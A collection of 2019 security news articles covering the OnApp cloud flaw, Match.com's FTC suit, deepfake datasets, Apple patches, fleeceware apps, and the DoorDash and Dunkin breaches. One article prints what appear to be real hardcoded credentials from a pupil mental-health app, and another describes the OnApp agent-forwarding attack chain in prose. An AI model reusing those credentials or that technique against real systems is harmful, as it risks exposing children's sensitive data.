STE WILLIAMS

Cloud Vulnerability Could Let One Server Compromise Thousands

A flaw in the OnApp cloud management platform could let an attacker compromise a private cloud with access to a single server.

A newly disclosed critical vulnerability in the OnApp cloud orchestration platform could let an attacker compromise an entire private cloud with access to a single server, researchers report.

The finding comes from researchers at security firm Skylight Cyber who say the flaw has the potential to affect hundreds of thousands of production servers and organizations around the world. OnApp is a London-based cloud management platform, one of the top firms that powers thousands of clouds for managed service providers, telcos, and other cloud hosting services.

Cloud security issues are common these days; however, we usually see them in the context of user misconfigurations and resulting accidental data leaks. In most cases, these mishaps are the user’s fault. This particular flaw, located in a management system that thousands of providers use, could let an attacker access, steal, change, or eliminate data on a server through no fault of the user or provider.

OnApp’s strategy for managing different servers in the cloud environment could allow attackers to achieve remote code execution (RCE) with root privileges. They simply need to rent a server — a simple process, and one that many companies require only an email address to do.

With that server, an attacker could compromise an entire private cloud due to the way OnApp manages different servers in the cloud environment, researchers explain in a technical blog post. Any user could trigger an SSH connection from OnApp to the managed server due to “agent forwarding,” which lets an attacker relay authentication to any server in the same cloud.

The vulnerability affects all OnApp control panels managing Xen or KVM compute resources, OnApp says in a security advisory. It does not affect OnApp control panels that only manage VMware vCloud Director, VMware vCenter environments, or CDN-only control panels. The company has issued a patch for the flaw and says there are no feasible workarounds for this.

Researchers tested, confirmed, and replicated their methodology across multiple cloud vendors, using OnApp for Xen and KVM hypervisors. In fact, it worked for them on the first try.

How They Found It
Skylight began investigating this in May when alerted to hate messages targeting the campaign of an Australian federal parliament member running for office. Emails were disguised to appear as though they came from many Australian businesses; however, they came from a single source.

Analysis of the emails led to the discovery of several servers used to send them. It seems the attacker preferred to use a single hosting company, probably because it didn’t require payment or ID to start a free 24-hour trial. Researchers decided to mimic the steps of the attacker and see if they left incriminating evidence. With nothing found, they hypothesized there could be a bug.

The researchers explored the control panel of the hosting company and saw there was an SSH connection between their server and the cloud provider. A public key had been pre-installed to access the server, prompting the team to wonder whether the management software was using the same key pair to manage every server. Researchers found this was the case, and they could launch an SSH connection to any server with the hosting company. They could do this even if they didn’t have the private key, which granted the same level of root access the provider had.

Agent forwarding made this possible. A feature of SSH, this lets you connect to a remote machine via SSH and give that machine the ability to use SSH to connect to other machines — without ever having the private authentication key or the passphrase that protects it, researchers explain.

The benefit is that someone can keep a private key locally, on one server, instead of storing it on multiple servers to authenticate connections. Using agent forwarding, this server can provide a remote server with the means to use the private key without having to expose it. The local machine answers “key challenges” and relays them through the remote server to target servers.

Researchers call this “an extremely dangerous feature.” With agent forwarding enabled, a remote server accepting your SSH connection could authenticate to any server that accepts your credentials. They were able to trigger management software to use SSH to connect to their server and run commands, then swap the code it was intended to execute with arbitrary code by replacing one of the binaries it commonly executes. OnApp’s configuration of SSH with agent forwarding gave researchers a full chain to compromise all servers in a hosting company with root privileges.

Researchers tested this by setting up a source server, which an attacker could obtain with a simple free trial, and a target server. They overwrote the “tput” binary on the source server with their own script that used SSH forwarding to connect with the target server and drop a flag file. They triggered the management software and saw the flag file appear on the target server.

“If we could replicate this across other companies, then the impact is much greater and more dangerous,” according to Skylight Cyber. “All we have to do is find cloud providers using OnApp, rent a couple of servers, and test our thesis again.”

The vulnerability was assigned to the ID CVE-2019-12491.

Related Content:

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Why Clouds Keep Leaking Data.”

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/cloud/cloud-vulnerability-could-let-one-server-compromise-thousands/d/d-id/1335943?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Match knowingly puts people at risk from scammers, FTC charges

Did you know that between 2013 and at least mid-2018, between 25% and 30% of profiles on dating site Match.com were reportedly fake?

As in, those “people” weren’t looking for love – they were looking to shake down legitimate subscribers, signing up just so they could run romance scams, phish people’s personal information, push dubious or unlawful products or services, or run extortion scams…?

Well, Match.com – the biggest online dating site in the US – most certainly knew, the Federal Trade Commission (FTC) alleges in a lawsuit it filed on Wednesday.

According to the complaint, in some months between 2013 and 2016, more than half of the IMs and favorites that consumers received came from accounts that Match had identified as phony.

Match used those fake dates to lure non-subscribers into signing up, the complaint alleges. As it is, anybody can sign up for free, including con artists, but you have to pay to respond to messages from other users who hit you up with likes, favorites, IMs or emails.

How can you resist? Who doesn’t want to be able to respond to some yummy looking thing who bothered to reach out to you?

Millions of messages from predators

The (big) problem, the FTC alleges: Match knew the messages were coming from scammers. Match filtered out messages from bogus accounts that were sent to paying subscribers, the regulator says, but it let those tantalizing, and risk-filled, messages fly free when they were sent to non-subscribers.

So not only was it luring non-subscribers into ponying up for a subscription, it was also needlessly putting them at risk of being victimized, the FTC claims:

Millions of contacts that generated Match’s ‘You caught his eye’ notices came from accounts the company had already flagged as likely to be fraudulent. By contrast, Match prevented existing subscribers from receiving email communications from a suspected fraudulent account.

Hundreds of thousands paid to get in touch with scammers

As the FTC complaint tells it, hundreds of thousands of people signed up to Match.com shortly after receiving communications from these fake profiles. From the court document:

From June 2016 to May 2018, for example, [Match’s own] analysis found that consumers purchased 499,691 subscriptions within 24 hours of receiving an advertisement touting a fraudulent communication.

When people subscribed in order to read these messages, one of two things would happen, neither of them good, the complaint said: either they’d get into a conversation with a scammer’s bogus profile, or they’d receive a notification saying that the profile that messaged them was “unavailable.”

That outcome depended on whether somebody subscribed before or after Match completed its fraud review process. If it was before, then the new subscriber got to see the scammer’s communication. If it was after the fraud review, the profile was listed as “unavailable.”

However, the FTC alleges, many times, Match hasn’t bothered to let people know that the Match.com users contacting them had their profiles yanked because there was a high likelihood that those users were fraudsters.

“Dating” for dollars

It would be nice to assume that anybody who’s using online dating these days knows that they’re targets. Unfortunately, that’s far from accurate: many people fall prey to scammers on dating sites.

Last month, for example, the US Department of Justice (DOJ) unsealed a 252-count, 145-page federal indictment charging 80 defendants with conspiring to steal millions of dollars through online frauds (including romance scams) that targeted businesses, the elderly and women.

Romance scams were just one of the swindles that the criminal network used, but they were one of the most profitable. In one case, a Japanese woman was bled of hundreds of thousands of dollars after meeting a fraudster who told her they were a captain in the US Army who wanted her to help smuggle diamonds out of Syria.

These type of romance scams are surging, the FBI has warned. In August 2019, the FBI’s online crime division – the Internet Crime Complaint Center (IC3) – issued a warning about the rising number of faux lover-boys and -girls who are turning to online dating sites to run romance or confidence frauds. Besides talking marks into sending money, a rising trend for these con artists is to try to talk them into becoming money mules or drug runners, the FBI said.

We’ve seen plenty of these scams in past years: FBI numbers show that in 2018 the number of people who filed complaints with the IC3, alleging that they were victims of romance/confidence frauds was more than 18,000 and reported losses of more than $362 million, making it the second costliest type of scam.

Selective fraud-flagging?

In spite of how very real the danger is, and how very effective the scams are, Match let these convincing, conniving crooks through, the FTC alleges. Selectively, that is.

The complaint says that between 2013 and mid-2018, Match delivered email communications from fraud-flagged users to non-subscribers while filtering them to keep them away from subscribers until the site finished its fraud review:

If, for example, a user [Match] flagged as potentially fraudulent had sent three emails to subscribers and three emails to nonsubscribers, [Match] would have withheld the three emails sent to subscribers until its fraud review was complete while allowing the three emails sent to nonsubscribers to reach their recipients.

Without this practice, the vast majority of these fraud-flagged Match.com users would never have been able to contact their intended recipients: between June 2016 and the beginning of May 2018, for example, approximately 87.8 percent of accounts whose messages [Match] withheld were later confirmed … to be fraudulent.

Not the first lawsuit

This isn’t the first we’ve heard of these allegations. In May 2018, a class action lawsuit was filed against Match parent company Match Group LLC, alleging that more than half of Match.com profiles are fake and are used to entice new members.

The FTC’s suit is seeking permanent injunctive relief, for the company’s contracts to be redone or rescinded, and for people to get their money back.

Match: The FTC’s making “outrageous claims”

The Verge reports that Match.com CEO Hesam Hosseini sent an internal email to executives on Wednesday morning that rejected the FTC’s allegations. From that email:

The FTC will likely make outrageous allegations that ignore all of Match’s efforts to prioritize the customer experience, including our efforts to combat fraud.

In the email, Hosseini said what the company went on to say in a statement in response to the lawsuit: that the company catches and neutralizes 85% of fraudulent accounts wthin the first 4 hours of their creation, “typically before they are even active on the site,” and that 96% of improper accounts are ferreted out within a day.

Match also maintains that the FTC has “misrepresented” internal emails and relied on “cherry-picked data” to make “outrageous claims.”

Hosseini also argued in the internal email that the accounts that the FTC defines as fraudulent aren’t related to scams but rather are the product of bots, spam, and people trying to sell a service on the dating site.

I believe the FTC has fundamentally misunderstood our work here, and we intend to fight any allegations.

Other complaints from the lawsuit

The FTC is also alleging that Match deceived people into subscribing by promising them a free six-month subscription if they didn’t “meet someone special.” It neglected to tell customers that they had to jump through a few hoops to get that free six months, though, the complaint says.

The FTC also claims that Match made canceling subscriptions very tough: it requires more than six clicks, according to the complaint. The company also allegedly locked people out of their accounts after they disputed charges, even if they lost their dispute and had time remaining in their subscription.

Watch “Romance scams” on Naked Security Live

(Watch directly on YouTube if the video won’t play here.)

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qoySkY_s2X8/

Google made thousands of deepfakes to aid detection efforts

Google has released a data set of thousands of deepfake videos that it produced using paid, consenting actors in order to help researchers in the ongoing work of coming up with detection methods.

In order for researchers to train and test automated detection tools, they need to feed them a whole lot of deepfakes to scrutinize. Google is helping by making its dataset available to researchers, who can use it to train algorithms that spot deepfakes.

The data set, available on Github, contains more than 3,000 deepfake videos. Google said on its artificial intelligence (AI) blog that the hyperrealistic videos, created in collaboration with its Jigsaw technology incubator, have been incorporated into the Technical University of Munich and the University Federico II of Naples’ new FaceForensics benchmark – an effort that Google co-sponsors.

To produce the videos, Google used 28 actors, placing pairs of them in quotidian settings: hugging, talking, expressing emotion and the like.


A sample of videos from Google’s contribution to the FaceForensics benchmark. To generate these, pairs of actors were selected randomly and deep neural networks swapped the face of one actor onto the head of another.

To transform their faces, Google used publicly available, state-of-the-art, automatic deepfake algorithms: Deepfakes, Face2Face, FaceSwap and NeuralTextures. You can read more about those algorithms in this white paper from the FaceForensics team. In January 2019, the academic team, led by a researcher from the Technical University of Munich, created another data set of deepfakes, FaceForensics++, by performing those four common face manipulation methods on nearly 1,000 YouTube videos.

Google added to those efforts with another method that does face manipulation using a family of dueling computer programs known as generative adversarial networks (GANs): machine learning systems that pit neural networks against each other in order to generate convincing photos of people who don’t exist. Google also added the Neural Textures image manipulation algorithm to the mix.

Yet another data set of deepfakes is in the works, this one from Facebook. Earlier this month, it announced that it was launching a $10m deepfake detection project.

It will, as the name DeepFake Detection Challenge suggests, help people detect deepfakes. Like Google, Facebook’s going to make the data set available to researchers.

An arms race

This is, of course, an ongoing battle. As recently as last month, when we heard about mice being pretty good at detecting deepfake audio, that meant that the critters were close to the median accuracy of 92% for state of the art detection algorithms: algorithms that detect unusual head movements or inconsistent lighting, or, in shoddier deepfakes, which spot subjects who don’t blink. (The US Defense Advanced Research Projects Agency [DARPA] has found that a lack of blinking, at least as of the circa August 2018 state of the technology’s evolution, was a giveaway.)

In spite of the current, fairly high detection rate, we need all the help we can get to withstand the ever more sophisticated fakes that are coming. Deep fake technology is evolving at breakneck speed, and just because detection is fairly reliable now doesn’t mean it’s going to stay that way. Thus was difficult-to-detect impersonation a “significant” topic at this year’s Black Hat and Def Con conferences, as the BBC reported last month.

We’re already seeing GANs reportedly used to create what an AP investigation recently suggested was a deepfake LinkedIn profile of a comely young woman who was suspiciously well-connected to people in power.

Forensic experts easily spotted 30-year-old “Katie Jones” as a deepfake. That was fairly recent: the story was published in June. Then, we got DeepNude, an app that also used GANs and which appeared to have advanced the technology all that much further, plus put it into an app that anybody could use to generate a deepfake within 30 seconds.

This isn’t Google’s first contribution to the field of unmasking fakes: in January, it released a database of synthetic speech to help out with fake audio detection. Google says that it also plans to add to its deepfake dataset as deepfake generation technology evolves:

We firmly believe in supporting a thriving research community around mitigating potential harms from misuses of synthetic media, and today’s release of our deepfake dataset in the FaceForensics benchmark is an important step in that direction.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/-p47wfO19Ec/

Chrome cripples movie studio Mac Pros

It’s not often that a single software bug can bring an entire industry to a virtual standstill, but it happened this week – and experts finally found an unlikely culprit.

The problem began on Monday 22 September when reports emerged of a problem with Macs running Avid software.

Avid is an editing suite that production companies use to put movies and TV programs together. A few days ago, movie editors started reporting that Mac Pros running Avid software were crashing. If users tried to restart their machines, they wouldn’t reboot. It left production studios ringing their hair as they lost valuable editing time.

Here’s one tweet from Shane Ross, staff editor at Prometheus Entertainment, as the situation broke:

And here’s Michael Kamens, assistant editor on Modern Family, complaining of the same thing:

Imagine how you’d be feeling if you were working on something with a deadline of hours, like a news segment.

Props to Avid, which was all over this problem from the beginning, dropping everything to work out the issue, in a perfect example of how to handle a technical issue properly. The company even put up a video:

What was going on? Was it a virus? Was it another crazy attack from hackers upset about a movie that they didn’t like?

Yesterday, we found out. Google did it.

The problem wasn’t with Avid, or with macOS, but with the Chrome browser. Google’s latest Chrome update had borked the system with a bug.

When Mac users install Chrome, they’re not just getting the browser. Google also installs another module under the hood called Keystone. It’s an update manager that regularly checks to see if there are new versions of Google programs and updates them behind the scenes. Doesn’t that make you feel safe? Well, it does, until it goes wrong. The latest version of Keystone was broken.

According to a Google post explaining the incident, Chrome damaged the file system on macOS machines. It said little more than that, other than providing some command line code to fix the issue. A Chrome bug report shed more light on the matter, though.

Chrome removed a symbolic link (symlink), which is a shortcut to a linked object. The system treats the symlink as the linked object. Keystone removed the /var symlink, which threw the affected Macs into disarray. Several online commentators have already labelled the bug a ‘varsectomy’. Geddit?

Macs are supposed to prevent programs from tinkering with the system by default, using a projective measure called System Integrity Protection (SIP). Also known as rootless, it’s a feature introduced in the El Capitan version of macOS that protects system-owned files from alteration. It even protects them from sudo, which is the Linux command that people use when they’re doing dangerous stuff on the system and need to escalate their privileges.

SIP is switched on by default, but programs wanting deep access to graphics cards, like, say, a movie editing program, often need it turned off. That’s why Avid users were so vulnerable to the issue, but it also affects pre-El Capitan versions of macOS that didn’t have SIP installed.

This just goes to show how much trouble a simple software bug can cause. The problem wasn’t with Avid or macOS at all, but with a completely different third-party app.

Google was still working on a patch at the time of writing. In the meantime, follow the instructions to fix the problem.

This is one situation where the classic question “have you tried turning it off and on again” most definitely would not have been advisable.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/BZ_Snk9ZWg4/

Apple users, patch now! The ‘bug that got away’ has been fixed

Remember the Black Hat conference of 2019?

Chances are you didn’t attend – even though it’s a huge event, the vast majority of cybersecurity professionals only experience it remotely – but you probably heard about some of the more dramatic talk titles…

…including one from Google with the intriguing title Look, no hands! – The remote, interaction-less attack surface of the iPhone.

The talk was presented by well-known Google Project Zero researcher Natalie Silvanovich, and it covered a wide-ranging vulnerability research project conduced by Silvanovich and her colleague Samuel Groß.

They decided to dig into the software components in your iPhone that automatically process data uploaded from the outside, to see if they could find bugs that might be remotely exploitable.

Silvanovich and Groß investigated five message-handling components on the iPhone: SMS, MMS, Visual voicemail, email and iMessage.

The idea was to search not for security bugs by which you could be tricked into making a serious security blunder, but for holes by which your device itself could be tricked without you even being involved.

They found several such flaws, denoted by the following CVE numbers: CVE-2019-8624, -8641, -8647, -8660, -8661, -8662, and -8663.

Most of those holes were revealed to the public in August 2019, following Project Zero’s usual approach of ‘dropping’ detailed descriptions and proof-of-concept code to do with vulnerabilities for which patches already exist.

That’s why we urged you, back in August 2019, to double-check that you were patched up to iOS 12.4 – it’s risky to be unpatched at any time, let alone after exploit code is available to anyone who cares to download it.

Interestingly, Google deliberately kept quiet about CVE-2019-8641 at the time, noting that Apple’s fix “did not fully remediate the issue”.

It looks as though the Project Zero researchers were right, because Apple’s latest slew of updates include a fix explicitly listed as:

   [Component:] Foundation

       Impact:  A remote attacker may be able to cause unexpected 
                application termination or arbitrary code execution

  Description:  An out-of-bounds read was addressed with improved 
                input validation

CVE-2019-8641:  Samuel Groß and Natalie Silvanovich 
                of Google Project Zero

What else?

If you have a Mac, the above patch is the only item listed in the latest update advisory.

The update isn’t big enough to get a new release number of its own, so it’s just macOS Mojave 10.14.6 Supplemental Update 2 (or Security Update 2019-005 if you are still on High Sierra 10.13.6 or Sierra 10.12.6).

If you have an iDevice that can’t run iOS 13 – for example, an iPhone 6 or earlier or an iPad mini 3 or earlier – then you get an update to iOS 12.4.2, and the above patch is the only one listed.

But Apple has listed many other fixes in iOS 13 along with the patch for CVE-2019-8641, including:

  • Fixing a data leakage bug related to watching movie files.
  • Closing another of José Rodríguez’s lock screen bypasses (CVE-2019-8742).
  • Beefing up Face ID to make it harder to bypass using 3D models (CVE-2019-8760).
  • Stopping a data leak via iOS 13’s new keyboard add-on system (CVE-2019-8704).

Stay put or move forward?

Slightly confusingly, the iOS 13 and iOS 13.1 advisories arrived at the same time, with the iOS 13.1 advisory listing only the patch for the lock screen bug found by José Rodríguez.

We’ve already been asked if this means that anyone who hasn’t yet updated to iOS 13, and who will now end up skipping straight from iOS 12.4.1 to iOS 13.1, will somehow skip the updates listed in the iOS 13 advisory.

As far as we can tell, the answer is, “No.”

A fresh install of iOS 13.1, or an update from any earlier version of iOS, is a cumulative update with everything you need rolled into it – if you skip over an update, you won’t skip the security fixes that were in it.

We don’t know why Apple didn’t publish its iOS 13 advisory when iOS actually came out, instead of confusingly giving the impression that iOS 13 and 13.1 are alternative choices that are both available now.

One guess is that Apple didn’t want to draw too much attention to the fact that although iOS 13 received its CVE-2019-8641 fix more than a week ago, there was no corresponding fix for iOS 12.4.1, which many users were stuck with due to the age of their devices.

Anyway, all supported Apple operating systems now have the revised CVE-2019-8641 update, and it’s worth updating for that alone.

What to do?

On your Mac, go to Apple  About This Mac  Software Update…

On your iPhone, go to Settings  General  Software Update.

If you are already up to date, macOS and iOS will tell you; if not, they’ll offer to do the update right away.

Given that the headline bug in this round of patches could be abused to inject malicious code from a distance – what’s known as RCE, or Remote Code Execution – without waiting for you to click or approve anything, we recommend doing an update check right now.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/vMQXw1rIjGw/

‘Fleeceware’ Play store apps quietly charging up to $250

Imagine an Android GIF-making app available on Google Play that automatically charges €214.99 ($253) to continue using it beyond its three-day trial period.

Or how about a completely unremarkable QR code reader app, whose developer thinks that a charge of €104.99 is a fair price to continue using it 72 hours after it was downloaded.

If you think these prices sound far-fetched, we have news – researchers at SophosLabs have discovered at least 15 apps which have been downloaded millions of times between them charging these extraordinary prices under Google’s nose.

The most unexpected part of this discovery? By exploiting a loophole in the Play store licensing regime, this behaviour appears to be legal.

Getting away with it

The scam works by exploiting the legitimate app behaviour of allowing users to download apps under a trial license period which, in this case, ends after a few days.

There is nothing obviously malicious about the apps, which mostly work as advertised, albeit that their features are identical to advertising-supported apps that cost nothing.

Importantly, the apps ask users to submit their payment details during the trial period, which most users probably assume won’t apply if they de-install the app.

Because the huge annual subscription price is only mentioned in small print, users probably assume the cost will be a few dollars or euros.

SophosLabs’ researchers discovered three apps charging €219.99 for full licenses, with another five charging €104.99, and one charging €114.99.

One of these ‘fleeceware’ apps had more than 10 million downloads, two had 5 million, with the rest between 5,000 and 50,000.

There doesn’t appear to be any easy way to recover the money either using chargeback or refunds.

SophosLabs malware analyst, Jagadeesh Chandraiah, with admirable understatement, said:

We haven’t seen apps sold at this price before.

When Naked Security covers stories of rogue apps in the Play store Google often doesn’t seem to notice the problem at all until researchers report the apps for malicious or exploitative behaviour.

The failure to spot what’s going on does seem to be an issue here too – SophosLabs offers examples of Play store users complaining about fleeceware apps, apparently without anyone higher up noticing this.

For example, the user who headlined their one-star app review “SCAM THAT TAKES YOUR 95 DOLLARS!!!,” before suggesting “take this app down Google.”

So far, the company also hasn’t clarified whether apps offered under trial with very high licensing prices might breach in-app policies.

Google didn’t notice the bad reviews, or high prices, until Sophos Labs alerted them to the issue, although last week 14 of the 15 named by SophosLabs were removed. Unfortunately, says Chandraiah…

A subsequent search revealed another batch of apps, with even higher download counts than the first, still available on the Play Market.

Which suggests this app behaviour might be what is called a ‘grey area’.

Because the apps themselves aren’t engaging in any kind of traditionally malicious activity, they skirt the rules that would otherwise make it easy for Google to justify removing them from the Play Market.

Perhaps this is simply an extreme case of caveat emptor (buyer beware). But on the app store of the world’s largest mobile operating system maker, users should surely never find themselves being charged hundreds of euros for an unremarkable GIF utility.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/H5gANUVkXYM/

Pupil mental health monitor promises app rewrite after hardcoded login creds discovered

Exclusive A British firm whose mobile apps monitor the mental state of 35,000 British schoolchildren is having to rewrite them after researchers found hardcoded login credentials within.

“Tracking steering biases is a pioneering technique developed by STEER using AI to identify patterns of bias linked to mental health risks in 10,000 test students,” burbles the company’s website.

Steer, a trading name of Mind.World Ltd, claims to have 150 subscribing schools. Included within the customer list on its website are British public schools such as Charterhouse, Fettes College, Oundle School and Wellington College.

Children enrolled in one of Steer’s apps are labelled as red, amber or green depending on how it grades their mental health in response to questionnaires they fill out.

Its flagship tech, deployed under the brands AS Tracking and CAS Tracking, are sold to schools as a way of monitoring their pupils’ wellbeing and allowing teachers to stage interventions.

“Since we began running AS Tracking we got a 20 per cent decrease in self harm at the college,” a teacher told Sky News on Monday, for a video feature extolling the firm’s virtues.

The company offers to let schools “track, signpost and support every pupil” through its apps, database functionality and analytics, boasting that by licensing each child for £18.75, schools can “benchmark” themselves “nationally”.

Yet versions of the apps developed for pupils and teachers alike contain hardcoded login credentials – posing a security risk to the most sensitive mental health data and information of the most vulnerable children.

Keys to the kids’ castle

Privacy advocate and internet troublemaker Gareth Llewellyn discovered the login credentials. Embedded within the Android version of AS Tracking were what appeared to be username and password pairs:

public static String AUTH_PASSWORD = "y2-@qtYg*xFMQ)g";
public static String AUTH_USERNAME = "usteer"; 

public static final String API_BASIC_AUTH_PASSWORD = "Shi$i7eth7ae";
public static final String API_BASIC_AUTH_USERNAME = "Testing";

Once The Register persuaded Steer to take our concerns seriously, the company responded by promising to rewrite its apps to remove the hardcoded credentials and improve its general security. It said that the testing account was not used in practice and claimed that the “usteer” credential pair was a “legacy” login which has now been disabled.

The firm told us:

Data privacy and security are Steer’s absolute priority so as soon as we were made aware of this potential issue, we started an investigation together with our third-party developers.

It’s important to state that all data stored on our servers is encrypted, and not attributable to individuals: access IDs are encrypted, passwords are hashed, and this information is separated from the encrypted assessment data, which requires a separately stored algorithm (and other information) to interpret. Accordingly, while our investigation is ongoing, we do not believe that any sensitive data was accessible, or exposed.

Steer concluded: “We have removed the credential information flagged by The Register and are applying additional security measures as a precaution.”

The good, the bad and the ugly

Duncan Brown, chief security strategist at web filtering biz Forcepoint, took a nuanced view of what happened here. He told The Reg: “The app developers are aiming to mitigate against the negative impact mental health issues can cause, and we should not shy away from using technology to assist people in understanding behavioural patterns.

“However, the security needs to be as robust as the science, particularly when dealing with such sensitive information held on minors. We should not avoid initiatives such as these simply to avoid potential privacy issues but privacy and security must be hardwired in: it’s extraordinary that in 2019 developers are still hardcoding passwords.”

Getting in a sneaky mention of his firm’s current product lineup, which depends on analytics and analysis, Brown opined: “As usage of behavioural analytics grows, we as an industry need to improve governance, clearly lay out the purpose of any data collection – and of course ensure that any personal data collected remains completely secure.”

Hardcoded credentials have caught out many a developer and company before. A smart home company called Zipato hardcoded the same private SSH key into all of its hubs, forcing the company to update all the devices and scrap the SSH tunnel. Similarly, Juniper Networks hardcoded login credentials into some of its data centre switches, a blunder discovered earlier this year.

Never one to be outdone in security snafus, Cisco admitted last year that it had not only left an undocumented root account in its video surveillance management software product, but that account also had hardcoded credentials.

The prevalence of these cockups doesn’t clear these companies of wrongdoing. In the 21st century nothing should be deployed publicly with hardcoded creds. ®

Sponsored:
Your Guide to Becoming Truly Data-Driven with Unrivalled Data Analytics Performance

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/27/pupil_mental_health_tracking_app_security_fears/

Is Your Organization Suffering from Security Tool Sprawl?

Most companies have too many tools, causing increased costs and security issues.

The advent of the cloud and software-as-a-service (SaaS) applications has given the IT industry many advantages, including increased agility and availability. Unfortunately, the trend has also significantly contributed to the growing issue of tool sprawl — the use of too many one-off specialized solutions — for both virtualized and point solutions.

Tool sprawl hurts IT productivity, resulting in troublesome management workflows and high costs. The compelling ease of deployment and flexibility of the cloud has led many organizations to adopt and deploy a wide roster of security solutions without having a comprehensive security strategy in place. According to a Forrester survey of IT decision-makers, 55% of respondents report having 20 or more tools between security and operations, and 70% say these tools lack full integration. For security specifically, simply deploying more technologies isn’t the best way to stop breaches — in fact, it can be the opposite. 

A common side effect of security tool sprawl is exposure to vulnerabilities and backdoors to serious threats. Hackers often exploit vulnerabilities in tools that do not communicate securely or are not regularly updated. With a piecemeal approach, your network can be open to threats that are commonly used for reconnaissance in early stages, as well as lateral movement and pivoting in later stages of an attack.

Each year, IT spending increases while countless new tools enter the market. Mergers and acquisitions increase tool sprawl as well. When one company absorbs another, they must integrate two entirely different IT infrastructures and inevitably some of the pieces overlap. Disentangling all of them is often not practical, and the new business winds up with multiple tools that serve the same function and often don’t integrate with one another.

The growing adoption of cloud management and cloud infrastructure makes this worse, since things like endpoint solutions and workstation instances running in public cloud infrastructures are much more likely to be overlooked in the integration process. According to a recent 451 Research survey, 39% of respondents juggle 11 to 30 monitoring tools to keep an eye on their application, infrastructure, and cloud environments — with 8% using between 21 and 30 tools! Rather than offering better visibility, adopting too many tools can result in high costs, inefficiencies, cumbersome workflows, and potential weak spots if security solutions aren’t deployed and managed strategically.

Be On Guard
Every organization should be on guard against security tool sprawl. With the increase in IT security spending and the growing adoption of new defense technologies, network administrators often find themselves toggling between a large roster of security solutions with overlapping use cases and functionality — sometimes across up to 10 or more in specific functional areas (based on conversations I’ve had network admin customers and resellers who work with them). This creates many issues, including everything from licensing costs to reduced productivity and increased chances of missing or mishandling critical patches and bug fixes.

IT decision-makers within organizations of all sizes should focus on putting measures into place that curb security tool sprawl and curtail the serious security issues that can arise as a result. Here are several key best practices that every organization can use to avoid security tool sprawl:

1. Clearly identify the scope and entities of coverage required before deploying a new security tool. It’s critical that you understand the various components of the IT infrastructure at hand (that is, network, endpoint, wireless, identities, etc.) and map security coverage across individual use cases (such as users, applications, physical, virtual, etc.). This will allow you to explore opportunities for consolidation when choosing the appropriate security solutions.

2. Take a platform-based approach to security, leveraging connectors and integrations. Look for platforms that offer layered security services across multiple use cases with a wide breadth of coverage either natively or with seamless technology integrations.

3. Segment your infrastructure based on intent. Logical segmentation can allow you to isolate critical assets. Network segmentation, microsegmentation, and macrosegmentation will all allow you to establish a secure environment and limit the exposure in distributed environments.

4. Take a unified approach to security monitoring. Ensure that you can centralize operations data and deploy strong tools to run analytics across a broad data set.

5. Implement strong, comprehensive access controls. Workflow-based multifactor authentication for users accessing applications and resources from devices can dramatically reduce, and even eliminate, the risk of security loopholes.

As the industry continues to adopt security tools delivered via convenient cloud services and SaaS-based procurement models, it will become increasingly important to identify and root out the inefficiencies and exposures caused by security tool sprawl. If you ignore this growing issue, potential data breaches could make the exorbitant costs and burdensome management associated with security tool sprawl the least of your worries. It’s the timeless “quality over quantity” argument. Businesses of all sizes must adopt simplified, unified security platforms that eliminate the need for so many point solutions — full stop.

Related Content:

 

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Why Clouds Keep Leaking Data.”

Himanshu Verma is a Director of Business Development at WatchGuard Technologies, with a primary focus on delivering WatchGuard products and solutions to strategic partners and the managed security service providers (MSSP) market. Prior to WatchGuard, he held product … View Full Bio

Article source: https://www.darkreading.com/cloud/is-your-organization-suffering-from-security-tool-sprawl/a/d-id/1335868?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

DoorDash Breach Affects 4.9M Merchants, Customers, Workers

The May 4 incident exposed data belonging to users on the platform on or before April 5, 2018.

Food delivery service DoorDash this week confirmed a data breach exposing information belonging to 4.9 million consumers, merchants, and delivery workers on its platform.

DoorDash learned of “unusual activity involving a third-party service provider,” which it did not specify, earlier this month. An investigation revealed an unauthorized party accessed some DoorDash data on May 4, 2019. While the company says it took “immediate steps” to block further access by the intruder, it’s unclear why the breach took nearly five months to notice.

Those who joined the platform on or before April 5, 2018 are affected by the breach; those who joined after April 5, 2018 are not. DoorDash is reaching out to users whose data was exposed.

The type of user data compromised could include profile information such as names, email addresses, delivery addresses, order history, phone numbers, and hashed, salted passwords. Attackers may have also obtained the last four digits of some consumers’ payment cards; however, DoorDash emphasizes full payment card numbers and CVVs were not accessed.

For some merchants and delivery workers, or “Dashers,” the last four digits of bank account numbers were compromised. Full bank account information was not. Approximately 100,000 Dashers also had their driver’s license numbers compromised in the breach.

DoorDash reports it has added security measures around its data, improved security protocols that grant access to its systems, and hired outside security experts for better threat detection.

Read more details here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “Why Clouds Keep Leaking Data

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/doordash-breach-affects-49m-merchants-customers-workers/d/d-id/1335938?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Dunkin do-nots: Deep-fried cake maker did not warn its sugar addicts that crooks raided web accounts, says NY AG

The US state of New York is suing food chain Dunkin Donuts for what is says is an illegal lapse in computer security.

NY Attorney General Letitia James said today the complaint stems from a 2015 raid on Dunkin’s website: fraudsters broke into individual customer accounts, stole those victims’ payment card info from the compromised Dunkin profiles, and sold that sensitive information online.

As many as 20,000 customer records were put up for sale on data-trading darknet markets, while Dunkin hushed up the theft, it is claimed. No one was alerted to the account hijackings, and no investigation took place, we’re told.

